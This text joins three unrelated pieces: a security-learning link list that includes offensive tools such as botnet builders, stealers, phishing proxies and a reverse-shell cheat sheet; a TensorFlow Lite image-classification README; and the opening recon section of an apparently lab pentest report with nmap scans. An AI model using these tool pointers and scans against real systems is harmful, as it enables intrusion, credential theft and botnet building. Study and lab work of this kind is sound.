rks-to-make-8-bit-pixel-art-e45d9b96cee7
- https://towardsdatascience.com/using-reinforcement-learning-to-trade-bitcoin-for-massive-profit-b69d0e8f583b
- https://towardsdatascience.com/naive-bayes-explained-108c095241eb
- https://towardsdatascience.com/basic-nlp-on-the-texts-of-harry-potter-sentiment-analysis-1b474b13651d
- https://machinelearningmastery.com/what-are-generative-adversarial-networks-gans
- https://realpython.com/k-means-clustering-python
- https://medium.com/dataseries/k-means-clustering-explained-visually-in-5-minutes-b900cc69d175
- https://joshualoong.com/2018/07/03/Topic-Modelling-Song-Lyrics-An-Exploration-in-Unsupervised-Text-Analytics/
- https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_tutorials.html
- https://towardsdatascience.com/using-nlp-to-identify-redditors-who-control-multiple-accounts-837483c8b782
# Cheatsheets
- https://cheatography.com/albertx/cheat-sheets/openssl/
- https://devhints.io/curl
- http://cs.lewisu.edu/~klumpra/camssem2015/nmapcheatsheet1.pdf
- https://highon.coffee/blog/nmap-cheat-sheet/
- https://www.cyberciti.biz/howto/question/general/compress-file-unix-linux-cheat-sheet.php
- https://tmuxcheatsheet.com/
- http://web.mit.edu/hackl/www/lab/turkshop/slides/regex-cheatsheet.pdf
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.aelius.com/njh/subnet_sheet.html
- https://medium.com/hacker-toolbelt/wireshark-filters-cheat-sheet-eacdc438969c
- https://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
- https://pequalsnp-team.github.io/cheatsheet/steganography-101
- https://codeyarns.com/2016/01/22/wget-cheatsheet/
- https://cheatsheet.dennyzhang.com/cheatsheet-ssh-a4
- https://gto76.github.io/linux-cheatsheet/
- https://digital-forensics.sans.org/media/reverse-engineering-malicious-code-tips.pdf
- https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf
# Encryption & Cryptography
- https://www.openpgp.org/
- https://digitalguardian.com/blog/what-pgp-encryption-defining-and-outlining-uses-pgp-encryption
- https://cs.nju.edu.cn/daihp/ns_course/04HaipengDai_SymmetricCrypto_2.pdf
- https://www.educause.edu/focus-areas-and-initiatives/policy-and-security/cybersecurity-program/resources/information-security-guide/toolkits/encryption-101
- https://idafchev.github.io/crypto/2017/04/13/crypto_part1.html
- https://simpleaswater.com/cryptography/
- http://pi.math.cornell.edu/~morris/135/Bacon.pdf
- http://practicalcryptography.com/ciphers/caesar-cipher
- https://www.boxentriq.com/code-breaking/caesar-cipher
- https://www.boxentriq.com/code-breaking/vigenere-cipher
- https://pages.mtu.edu/~shene/NSF-4/Tutorial/VIG/Vig-Base.html
- http://practicalcryptography.com/ciphers/simple-substitution-cipher
- https://blog.finjan.com/substitution-ciphers-a-look-at-the-origins-and-applications-of-cryptography
- https://blog.logsign.com/how-does-xor-cipher-work
- https://stackoverflow.com/questions/2029426/what-is-xor-encryption
- https://ctf101.org/cryptography/what-is-xor
- https://idafchev.github.io/crypto/2017/04/13/crypto_part1.html
- https://math.stackexchange.com/questions/28955/how-to-break-xor-cipher-with-repeating-key
- https://carterbancroft.com/breaking-repeating-key-xor-programmatically/
- https://stackoverflow.com/questions/4078902/cracking-short-rsa-keys
- https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
- https://www.techrepublic.com/article/how-to-sign-a-file-on-linux-with-gpg
- https://web.mit.edu/kerberos
- https://asecuritysite.com/encryption/rsa12_2
-
# Apts
- https://resources.malwarebytes.com/files/2020/04/200407-MWB-COVID-White-Paper_Final.pdf
- https://threatconnect.com/blog/using-fancy-bear-ssl-certificate-information-to-identify-their-infrastructure
- https://www.crowdstrike.com/blog/who-is-fancy-bear
- https://content.fireeye.com/apt-41/rpt-apt41
- https://threatpost.com/equation-apt-group-attack-platform-a-study-in-stealth/111550
- https://securelist.com/equation-the-death-star-of-malware-galaxy/68750
- https://us-cert.cisa.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
- http://www.robertmlee.org/critiques-of-the-dhsfbis-grizzly-steppe-report
- https://unit42.paloaltonetworks.com/ironnetinjector
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data
- https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time
-
-
# PHISHING TOOLS
- Modlishka. Reverse Proxy - https://github.com/drk1wi/Modlishka
- Evilginx2 MITM phishing - https://github.com/kgretzky/evilginx2
- HiddenEye - https://github.com/DarkSecDevelopers/HiddenEye
# OSINT
- Mitaka A Browser Extension For OSINT Search - https://github.com/ninoseki/mitaka
- DarkScrape OSINT Tool For Scraping Dark Websites - https://github.com/itsmehacker/DarkScrape
- Sherlock Find Usernames Across Social Networks - https://github.com/sherlock-project/sherlock
- OSINT-SPY Search using OSINT - https://github.com/SharadKumar97/OSINT-SPY
- SpiderFoot OSINT Tool - https://github.com/smicallef/spiderfoot
- KillShot A Penetration Framework - https://github.com/bahaabdelwahed/killshot
- Ethereum recon and exploitation tool - https://github.com/cleanunicorn/theo
- Find breached emails, databases, pastes - https://github.com/Ekultek/WhatBreach
- Xray - A Tool For Recon, Mapping And OSINT Gathering - https://github.com/evilsocket/xray
- OSINT framework - https://osintframework.com/
- Discover - https://github.com/leebaird/discover
- ReconCobra - https://github.com/haroonawanofficial/ReconCobra
- plot a Twitter user’s activity onto a map - http://geosocialfootprint.com/
- View DNS - https://viewdns.info/
- Twitter trend map - https://www.trendsmap.com/
# Windows SubSystem
- https://docs.microsoft.com/en-us/windows/wsl/install-win10
- https://docs.microsoft.com/en-us/windows/wsl/faq
- https://blogs.windows.com/windowsdeveloper/2016/07/22/fun-with-the-windows-subsystem-for-linux/
- https://wiki.ubuntu.com/WSL
- https://github.com/sirredbeard/Awesome-WSL
# MALWARE
- fireELF - Fileless Linux Malware Framework - https://github.com/rek7/fireELF
- Ustealer - Ubuntu Stealer, Steal Ubuntu Information - https://github.com/atmoner/Ustealer
- BYOB (Build Your Own Botnet) - https://github.com/malwaredllc/byob
- UBoat - HTTP Botnet Project - https://github.com/Souhardya/Uboat
# Hardware
- Posion tap - https://samy.pl/poisontap/
- Rubber ducky on steroids - https://github.com/whid-injector/WHID
- PI hole - https://github.com/pi-hole/pi-hole
- Homemade LAN turtle - https://github.com/CuPcakeN1njA/Int3rcept0r
- Rasp pi AI Security camera - https://medium.com/berrynet/diy-your-ai-home-security-camera-with-raspberry-pi-and-open-source-software-10d4364df20f
- https://hakin9.org/pi-sniffer-is-a-wi-fi-sniffer-built-on-the-raspberry-pi-zero-w
# Cryptocurrency & Blockchains & Tokens
- Bitcoin - https://www.bitcoin.com/
- Monero - https://www.getmonero.org/
- Zcash - https://z.cash/
- Ethereum - https://ethereum.org
- RavenCoin - https://ravencoin.org
- DogeCoin - https://dogecoin.com
- TurtleCoin - https://turtlecoin.lol
- LiteCoin - https://litecoin.org
- BitcoinCash - https://bitcoincash.org
- Dash - https://www.dash.org
- Stellar - https://www.stellar.org
- Mining - https://www.investopedia.com/tech/how-does-bitcoin-mining-work/
- 51% attack - https://github.com/cburchert/shitcoin\
- Play with blockchain - https://github.com/DutchGraa/crackcoin
- Monero Info - https://www.monero.how/monero-infographic
- Simulated Blockchains for Machine Learning Traceability and Transaction Values in the Monero - https://arxiv.org/abs/2001.03937
- How Blockchain works - http://blockchain.mit.edu/how-blockchain-works
- http://list.zju.edu.cn/kaibu/netsec/lec04-blockchain.ppt
- https://www.exablue.de/en/blog/2020-06-11-malware-on-the-blockchain.html
- https://cryptofacilities.zendesk.com/hc/en-us/articles/115002807834-Calculation-of-profit-and-loss
- https://github.com/citp/BlockSci
- https://bitcointalk.org/index.php?topic=5141594.0
- https://medium.com/@philipshen13/monero-part-1-key-concepts-3671186016c6
- https://blockchain.unica.it/projects/blockchain-analytics
- https://youtu.be/cjbHqvr4ffo - How Does Monero Work?
- https://bitcoin.stackexchange.com/questions/59955/how-do-i-calculate-the-profit-of-the-value-of-my-bitcoin
- https://reserve.org
- https://foam.space
- https://dad.one
- https://getravencoin.org/ravencoin-asset-token
- https://hackernoon.com/what-are-stellar-assets-79b3145b5c7f
- https://tronblack.medium.com/ravencoin-proof-of-authenticity-4a0d325d5347
-
# Offline wallet
- https://moneroaddress.org
- https://bitcoinpaperwallet.com
- https://turtlecoin.lol/wallet
- https://stellarpaperwallet.com
- https://walletgenerator.net
# Govt
- https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf
- https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final
- https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final
- https://csrc.nist.gov/publications/detail/sp/800-94/final
- https://www.nist.gov/risk-management
-
# Tor
- Tor's web site - https://www.torproject.org
- Dark web sites - https://dark.fail/#Philosophy
- How tor works - https://jordan-wright.com/blog/2015/02/28/how-tor-works-part-one
# BlockChain Analysis
- Wallet Explorer - https://www.walletexplorer.com
- C-Hound - https://www.c-hound.ai
- BlockChain - https://www.blockchain.com
- BlockChair - https://blockchair.com
- Blockchain Analysis - https://Blockstream.info
- https://oxt.me
- https://matbea.net
- https://sochain.com
# Centos
- https://www.tecmint.com/things-to-do-after-minimal-rhel-centos-7-installation
- https://doc.lagout.org/operating%20system%20/linux/Foundations%20of%20CentOS%20Linux.pdf
-
# Malware Samples
NOTE: The ones with * after the links are ones that are vetted. If you use your uc email and tell them your a cyber student, they wil mostly likely give you access.
- Hybrid analysis - https://www.hybrid-analysis.com
- VirusShare - https://virusshare.com*
- VirusTotal - https://www.virustotal.com
# Threat Maps
- https://threatmap.checkpoint.com
- https://cybermap.kaspersky.com
- https://www.fireeye.com/cyber-map/threat-map.html
- https://threatmap.fortiguard.com
- https://map.lookingglasscyber.com
# SCANNERS
- shuffleDNS is a wrapper around massdns - https://github.com/projectdiscovery/shuffledns
- Fast web fuzzer written in Go - https://github.com/ffuf/ffuf
- bruteforce for AWS s3 buckets - https://github.com/nahamsec/lazys3
- MassDNS subdomain enumeration - https://github.com/blechschmidt/massdns
- Fenrir Simple Bash IOC Scanner - https://github.com/Neo23x0/Fenrir
- Slurp S3 Bucket Enumerator - https://github.com/hehnope/slurp
- RapidScan Web Scanner - https://github.com/skavngr/rapidscan
- black box WordPress security - https://github.com/wpscanteam/wpscan
- ALT DNS - DNS recon - https://github.com/infosec-au/altdns
- Sn1per automated scanner - https://github.com/1N3/Sn1per
- Httpgrep - Scans HTTP Servers To Find Given Strings In URIs - https://github.com/noptrix/httpgrep
- https://github.com/aboul3la/Sublist3r
- https://github.com/maurosoria/dirsearch
- https://github.com/guelfoweb/knock
- https://github.com/nahamsec/lazyrecon
- https://cirt.net/Nikto2
- https://github.com/yanxiu0614/subdomain3
- https://github.com/swisskyrepo/SSRFmap
-
# WEB
- Trasxss automated XSS - https://github.com/M4cs/traxss
- XSpear Powerfull XSS Scanning And Parameter Analysis Tool - https://github.com/hahwul/XSpear
- XSSCon: Simple XSS Scanner tool - https://github.com/menkrep1337/XSSCon
- Corsy - CORS Misconfiguration Scanner - https://github.com/s0md3v/Corsy
- https://fsec404.github.io/blog/HTTP-parameter-pollution/
- https://telekomsecurity.github.io/2020/05/smuggling-http-headers-through-reverse-proxies.html
- https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
- https://www.rapid7.com/fundamentals/web-application-vulnerabilities
-
# Bug Bounty
- https://shkspr.mobi/blog/2018/12/twitter-bug-bounty
- https://www.reddit.com/r/bugbounty/comments/983odf/how_to_become_a_bug_bounty_hunter
- https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2020
- https://medium.com/@muff1n/how-to-become-a-bug-bounty-hunter-dffce2bb333c
- https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts
- https://0xsha.gitbook.io/bug-bounties-five-weeks-to-your-first-bug
- https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0
- https://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass
- https://blog.intigriti.com/2020/02/24/twitter-recap-1-bug-bounty-tips-by-the-intigriti-community/#tools_5
- https://bugbountyguide.com/
- https://www.hackerone.com/blog/100-hacking-tools-and-resources
- https://hackerone.com/reports/867952
- https://keenlab.tencent.com/en/2020/01/02/exploiting-wifi-stack-on-tesla-model-s
- https://research.securitum.com/xss-in-amp4email-dom-clobbering
- https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248
- https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65
- https://pentester.land/list-of-bug-bounty-writeups.html
- https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
- https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards
- https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
- https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple
- https://medium.com/@zonduu/idor-in-session-cookie-leading-to-mass-account-takeover-d815ff3732d5
- https://www.bad5ect0r.sh/index.php/2020/05/17/stored-xss-password-disclosure
- https://github.com/pry0cc/axiom
- https://challenge.intigriti.io/
- https://opnsec.com/2020/05/dom-xss-in-gmail-with-a-little-help-from-chrome
- https://hethical.io/stealing-the-trello-token-by-abusing-a-cross-iframe-xss-on-the-butler-plugin
- https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts
- http://blog.oath.ninja/basic-bug-bounty-faq
- https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
- https://0xsha.gitbook.io/bug-bounties-five-weeks-to-your-first-bug
- https://portswigger.net/research/bypassing-csp-with-policy-injection
- https://www.bugcrowd.com/resources/webinars/api-security-testing-for-hackers
- https://samcurry.net/hacking-starbucks
- https://exploitway.com/github-dorks-for-penetration-testing
- https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1
- https://shahmeeramir.com/methods-to-bypass-csrf-protection-on-a-web-application-3198093f6599
- https://research.securitum.com/what-is-the-csrf-cross-site-request-forgery-vulnerability
- https://www.errno.fr/Attacking_source_repositories
- https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
- https://secapps.com/tutorials/security-testing-beyond-the-edge
- https://medium.com/bugbountywriteup/the-1-000-worth-cookie-6cf48af08e08
- https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards
- https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696
- https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee
- https://hackernoon.com/how-to-find-internal-subdomains-yql-yahoo-and-bug-bounty-d7730b374d77
# NEWS SITES
- BleepingComputer - https://bleepingcomputers.com
- The Hacker News - https://thehackernews.com
- ThreatPost - https://threatpost.com
- SecureList - https://securelist.com
- DarkReading - https://www.darkreading.com
- Krebs On Security - https://krebsonsecurity.com
- Sucuri - https://blog.sucuri.net
- Unit42 - https://unit42.paloaltonetworks.com
- Zdnet - https://www.zdnet.com
- HackRead - https://www.hackread.com
- CSO - https://www.csoonline.com
- BitDefender - https://labs.bitdefender.com
- Malwarebytes - https://blog.malwarebytes.com
- Netsec - https://reddit.com/r/netsec
- CheckPoint - https://research.checkpoint.com
# XSS
- https://www.google.com/about/appsecurity/learning/xss
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- https://xsses.rocks/sample-page
- https://github.com/wish-i-was/femida
# SQL Injection Tools
- SQLMap - https://github.com/sqlmapproject/sqlmap
- jSQL Injection is a Java application - https://github.com/ron190/jsql-injection
- Blisqy - Exploit Time-based blind-SQL - https://github.com/JohnTroony/Blisqy
# SQL Injection
- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet
- http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
- https://www.exploit-db.com/papers/13650
- https://trustfoundry.net/bypassing-wafs-with-json-unicode-escape-sequences
- https://realpython.com/prevent-python-sql-injection
- https://bobby-tables.com
- http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
- https://portswigger.net/web-security/sql-injection
- https://www.rapid7.com/fundamentals/sql-injection-attacks/
-
# CSRF
- https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
- https://trustfoundry.net/cross-site-request-forgery-cheat-sheet
# Google Hacking
- https://www.exploit-db.com/google-hacking-database
- https://securitytrails.com/blog/google-hacking-techniques
- https://medium.com/infosec-adventures/google-hacking-39599373be7d
# Python
- https://codecademy.com/learn/learn-python
- https://docs.python-guide.org/intro/learning
- https://medium.com/swlh/5-free-python-courses-for-beginners-to-learn-online-e1ca90687caf
- https://docs.microsoft.com/en-us/learn/modules/intro-to-python
- https://refactoring.guru/design-patterns
- https://alysivji.github.io/simple-plugin-system.html
- https://eli.thegreenplace.net/2012/08/07/fundamental-concepts-of-plugin-infrastructures
- https://www.abhishekshukla.com/python/adventures-in-cryptography-with-python-xor-cipher
- https://docs.python.org/3/tutorial/datastructures.html
- https://docs.python.org/2/tutorial/classes.html
- https://en.ogunal.com/data-collection-with-python-on-linux-system
- https://wiki.python.org/moin/ForLoop
- https://www.digitalocean.com/community/tutorials/how-to-construct-for-loops-in-python-3
- https://www.digitalocean.com/community/tutorials/understanding-lists-in-python-3
- https://www.pitt.edu/~naraehan/python3/split_join.html
- https://medium.com/swlh/list-comprehensions-in-python-3-for-beginners-8c2b18966d93
- https://www.guidodiepen.nl/2019/02/implementing-a-simple-plugin-framework-in-python
- https://python-reference.readthedocs.io/en/latest/docs/functions/__import__.html
- https://dev.to/serhatteker/how-to-upgrade-to-python-3-7-on-ubuntu-18-04-18-10-5hab
- https://archive.org/details/comp3321 ( requested from NSA by Freedom of Information Act- python courses)
- https://www.digitalocean.com/community/tutorials/understanding-dictionaries-in-python-3
- https://www.digitalocean.com/community/tutorials/how-to-index-and-slice-strings-in-python-3
- https://realpython.com/python-data-classes
- https://realpython.com/python-f-strings
- https://deepsource.io/blog/python-walrus-operator
- https://dabeaz-course.github.io/practical-python/Notes/Contents.html
# Ruby
- http://rubylearning.com
- https://www.ruby-lang.org/en/documentation/quickstart
- https://ruby-doc.com/docs/ProgrammingRuby
- https://www.codecademy.com/learn/learn-ruby
- https://refactoring.guru/design-patterns
- https://github.com/arbox/machine-learning-with-ruby
- https://ruby.github.io/rake/doc/rakefile_rdoc.html
- https://medium.com/@jaeger.rob/a-simple-ruby-rakefile-for-tests-149a7b783c52
- http://sinatrarb.com
- https://thoughtbot.com/blog/lets-build-a-sinatra
- https://linuxize.com/post/how-to-install-ruby-on-ubuntu-18-04
- https://ankane.org/more-ml-gems
- https://dev.to/daviducolo/machinelearning-with-ruby-3m75
# C++
- https://www.cplusplus.com
- https://docs.microsoft.com/en-us/cpp/cpp/for-statement-cpp?view=vs-2019
- https://www.cs.bu.edu/teaching/cpp/writing-makefiles
- https://www.cs.fsu.edu/~myers/howto/g++compiling.txt
- https://en.cppreference.com/w/cpp/language/main_function
- https://www.cplusplus.com/doc/tutorial/program_structure
- https://www.guru99.com/cpp-file-read-write-open.html
- https://www.programiz.com/cpp-programming/inheritance
- https://docs.microsoft.com/en-us/cpp/cpp/main-function-command-line-args?view=msvc-160
- https://www.geeksforgeeks.org/command-line-arguments-in-c-cpp
-
# Honey Pots
- https://github.com/wish-i-was/femida
- https://github.com/cowrie/cowrie
- https://github.com/foospidy/HoneyPy
- https://github.com/magisterquis/sshhipot
- https://github.com/desaster/kippo
- https://github.com/andrewmichaelsmith/bluepot
- https://github.com/mushorg/conpot
- https://lwn.net/Articles/240120
- https://github.com/mhils/HoneyProxy
- https://github.com/amv42/sshd-honeypot
-
# CTF
- https://github.com/gabemarshall/microctfs
- FaceBook CTF - https://github.com/facebook/fbctf
- https://laconicwolf.com/2018/06/11/cryptopals-challenge-5-repeating-key-xor-encryption
- https://truedigitalsecurity.com/blog/csaw-2015-crypto-500-bricks-of-gold-writeup
- https://www.tunnelsup.com/helpful-linux-commands-for-ctfs
- https://www.tildeho.me/ritsec-ctf-writeup-recover-aes-cbc-iv
- https://mikehacksthings.com/2019/11/07/my-favorite-challenge-of-the-fall-2019-hackathon
- https://mikehacksthings.com/2018/11/19/cny-hackathon-ctf-walkthrough-fall-2018-edition
- https://medium.com/@thereallulz/write-up-some-random-ctf-challenges-stego-part-1-be6e0c17fd4e
- https://underthewire.tech/
- https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
- https://blog.sqreen.com/local-file-inclusions-explained/
- https://ctftime.org/writeup/19017
# CTF Tools
- https://github.com/lockedbyte/cryptovenom
- https://github.com/hellman/xortool
- https://github.com/DominicBreuker/stego-toolkit
- https://github.com/Acceis/crypto_identifier
|
# TensorFlow Lite C++ image classification demo
This example shows how you can load a pre-trained and converted
TensorFlow Lite model and use it to recognize objects in images.
Before you begin,
make sure you [have TensorFlow installed](https://www.tensorflow.org/install).
You also need to
[install Bazel](https://docs.bazel.build/versions/master/install.html) in order
to build this example code. And be sure you have the Python `future` module
installed:
```
pip install future --user
```
## Build the example
First run `$TENSORFLOW_ROOT/configure`. To build for Android, set
Android NDK or configure NDK setting in
`$TENSORFLOW_ROOT/WORKSPACE` first.
Build it for desktop machines (tested on Ubuntu and OS X):
```
bazel build -c opt //tensorflow/lite/examples/label_image:label_image
```
Build it for Android ARMv8:
```
bazel build -c opt --config=android_arm64 \
//tensorflow/lite/examples/label_image:label_image
```
Build it for Android arm-v7a:
```
bazel build -c opt --config=android_arm \
//tensorflow/lite/examples/label_image:label_image
```
## Download sample model and image
You can use any compatible model, but the following MobileNet v1 model offers
a good demonstration of a model trained to recognize 1,000 different objects.
```
# Get model
curl https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_02_22/mobilenet_v1_1.0_224.tgz | tar xzv -C /tmp
# Get labels
curl https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_1.0_224_frozen.tgz | tar xzv -C /tmp mobilenet_v1_1.0_224/labels.txt
mv /tmp/mobilenet_v1_1.0_224/labels.txt /tmp/
```
## Run the sample on a desktop
```
bazel-bin/tensorflow/lite/examples/label_image/label_image \
--tflite_model /tmp/mobilenet_v1_1.0_224.tflite \
--labels /tmp/labels.txt \
--image tensorflow/lite/examples/label_image/testdata/grace_hopper.bmp
```
You should see results like this:
```
Loaded model /tmp/mobilenet_v1_1.0_224.tflite
resolved reporter
invoked
average time: 68.12 ms
0.860174: 653 653:military uniform
0.0481017: 907 907:Windsor tie
0.00786704: 466 466:bulletproof vest
0.00644932: 514 514:cornet, horn, trumpet, trump
0.00608029: 543 543:drumstick
```
## Run the sample on an Android device
Prepare data on devices, e.g.,
```
adb push bazel-bin/tensorflow/lite/examples/label_image/label_image /data/local/tmp
adb push /tmp/mobilenet_v1_1.0_224.tflite /data/local/tmp
adb push tensorflow/lite/examples/label_image/testdata/grace_hopper.bmp /data/local/tmp
adb push /tmp/labels.txt /data/local/tmp
```
Run it, `adb shell "/data/local/tmp/label_image \ -m
/data/local/tmp/mobilenet_v1_1.0_224.tflite \ -i
/data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt"` then you
should see something like the followings: `Loaded model
/data/local/tmp/mobilenet_v1_1.0_224.tflite resolved reporter INFO: Initialized
TensorFlow Lite runtime. invoked average time: 25.03 ms 0.907071: 653 military
uniform 0.0372416: 907 Windsor tie 0.00733753: 466 bulletproof vest 0.00592852:
458 bow tie 0.00414091: 514 cornet`
Run the model with NNAPI delegate (`-a 1`), `adb shell
"/data/local/tmp/label_image \ -m /data/local/tmp/mobilenet_v1_1.0_224.tflite \
-i /data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt -a 1 -f 1"`
then you should see something like the followings: `Loaded model
/data/local/tmp/mobilenet_v1_1.0_224.tflite resolved reporter INFO: Initialized
TensorFlow Lite runtime. INFO: Created TensorFlow Lite delegate for NNAPI.
Applied NNAPI delegate.invoked average time: 10.348 ms 0.905401: 653 military
uniform 0.0379589: 907 Windsor tie 0.00735866: 466 bulletproof vest 0.00605307:
458 bow tie 0.00422573: 514 cornet`
To run a model with the Hexagon Delegate, assuming we have followed the
[Hexagon Delegate Guide](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/g3doc/performance/hexagon_delegate.md)
and installed Hexagon libraries in `/data/local/tmp`. Run it `adb shell
"/data/local/tmp/label_image \ -m
/data/local/tmp/mobilenet_v1_1.0_224_quant.tflite \ -i
/data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt -j 1"` then you
should see something like the followings: ``` Loaded model
/data/local/tmp/mobilenet_v1_1.0_224_quant.tflite resolved reporter INFO:
Initialized TensorFlow Lite runtime. INFO: Created TensorFlow Lite delegate for
Hexagon. INFO: Hexagon delegate: 31 nodes delegated out of 31 nodes.
remote_handle_control available and used Applied Hexagon delegate.invoked
average time: 8.307 ms 0.729412: 653 military uniform 0.0980392: 907 Windsor tie
0.0313726: 466 bulletproof vest 0.0313726: 458 bow tie 0.0117647: 700 panpipe
```
See the `label_image.cc` source code for other command line options.
|
# Banzai
## Table of Contents
* [Executive Summary](#executive-summary)
* [Attack Vectors](#attack-vectors)
* [Recommendations](#recommendations)
* [Methodology](#methodology)
* [Reconnaissance](#reconnaissance)
* [Enumeration](#enumeration)
* [Gaining Access](#gaining-access)
* [Maintaining Access](#maintaining-access)
* [Covering Tracks](#covering-tracks)
* [Additional Items](#additional-items)
# Executive Summary
On 1 August 2021, Victor Fernandez III performed a penetration test of the Offensive Security exam network. This report includes detailed information about the vulnerabilities he discovered as well as recommendations for mitigating each of them. This report also contains an outline of the methodolgy he used to enumerate and exploit the THINC.local domain. During the penetration test, Victor was able to gain administrator-level access to multiple computers, primarly due to out-of-date and/or misconfigured software. A brief description of each computer compromised is listed below.
## Attack Vectors
| Vulnerabilities | Exploits |
| --- | ---|
| CVE-2008-1234 | EDB-ID-56789 |
| CVE-2012-5678 | cyberphor POC |
## Recommendations
Victor recommends patching the vulnerabilities he identified to mitigate the risk of exploitation and/or unauthorized access to Offensive Security information systems. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
# Methodology
Victor used a widely-adopted and phased approach for the penetration test. This included reconnaissance, enumeration, gaining access, maintaining access, and covering his tracks. Below is an outline of Victor's activities and serves to demonstrate how he identified and exploited a variety of information systems across the Offensive Security exam network.
## Reconnaissance
The purpose of the reconnaissance phase of a penetration test is to identify information and sytems that represent the organization online and then, discover possible attack vectors. For this penetration test, Victor was asked to narrow his information gathering objectives to collecting the details below.
### General Information
* Hostname: banzai
* Description:
* IP Address: 192.168.166.56
* MAC Address: (ref:)
* Domain: WORKGROUP
* Distro: (ref:)
* Kernel: Linux (ref:)
* Architecture: (ref:)
### Ports
```bash
# Nmap 7.91 scan initiated Fri Aug 6 07:49:21 2021 as: nmap -sS -sU -p- --min-rate 1000 -oN scans/banzai-nmap-complete 192.168.166.56
Nmap scan report for 192.168.166.56
Host is up (0.11s latency).
Not shown: 65535 open|filtered ports, 65528 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
5432/tcp open postgresql
8080/tcp open http-proxy
8295/tcp open unknown
# Nmap done at Fri Aug 6 07:53:44 2021 -- 1 IP address (1 host up) scanned in 262.73 seconds
```
### Service Versions
```bash
# Nmap 7.91 scan initiated Fri Aug 6 07:59:10 2021 as: nmap -sV -sC -pT:20,21,22,25,5432,8080,8295 -oN scans/banzai-nmap-versions 192.168.166.56
Nmap scan report for 192.168.166.56
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| 256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_ 256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.17
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
